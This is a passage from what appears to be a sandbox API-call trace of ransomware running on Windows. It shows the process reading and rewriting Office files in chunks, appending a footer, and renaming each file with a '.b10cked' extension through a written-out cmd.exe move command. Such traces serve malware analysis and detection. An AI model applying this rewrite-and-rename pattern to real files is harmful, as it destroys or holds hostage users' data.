lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0153.329] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21011886850) returned 1 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2ce878 [0153.331] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, 
lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2ced60 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2ced60 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.350] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.490] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, 
lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.516] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.517] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.603] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0153.603] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0153.608] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff10000 [0153.611] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.613] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.613] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.613] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.614] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.614] WriteFile (in: hFile=0x114, 
lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.614] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0153.614] VirtualFree (lpAddress=0x7ff10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.616] SetFilePointer (in: hFile=0x114, lDistanceToMove=1310720, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140000 [0153.616] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.733] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.742] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.750] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.752] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0153.753] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0153.756] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=1310720, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140000 [0153.756] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.756] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.756] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.757] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.757] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0153.757] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.759] SetFilePointer (in: hFile=0x114, lDistanceToMove=2621440, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x280000 [0153.759] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.772] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.775] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.775] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.894] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0153.896] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0153.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=2621440, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x280000 [0153.899] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.900] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.900] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.901] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) 
returned 1 [0153.901] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0153.901] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.903] SetFilePointer (in: hFile=0x114, lDistanceToMove=-262144, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x28ed60 [0153.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0153.906] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0153.909] SetFilePointer (in: hFile=0x114, lDistanceToMove=-262144, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x28ed60 [0153.910] WriteFile (in: hFile=0x114, 
lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.910] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.910] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.910] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.910] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0153.910] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0153.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2ced60 [0153.918] WriteFile (in: hFile=0x114, 
lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0153.918] CloseHandle (hObject=0x114) returned 1 [0154.048] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX") returned 0x3c [0154.049] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0154.050] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x8ac, dwThreadId=0xda8)) returned 1 [0154.052] CloseHandle (hObject=0x110) returned 1 [0154.052] CloseHandle (hObject=0x114) returned 1 [0154.052] CharUpperBuffW (in: lpsz="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.052] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.052] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0154.052] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.052] ReleaseMutex (hMutex=0xf8) returned 1 [0154.052] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.052] ReleaseMutex (hMutex=0xf8) returned 1 [0154.052] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.052] ReleaseMutex (hMutex=0xf8) returned 1 [0154.052] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.053] ReleaseMutex (hMutex=0xf8) returned 1 [0154.053] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0154.144] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 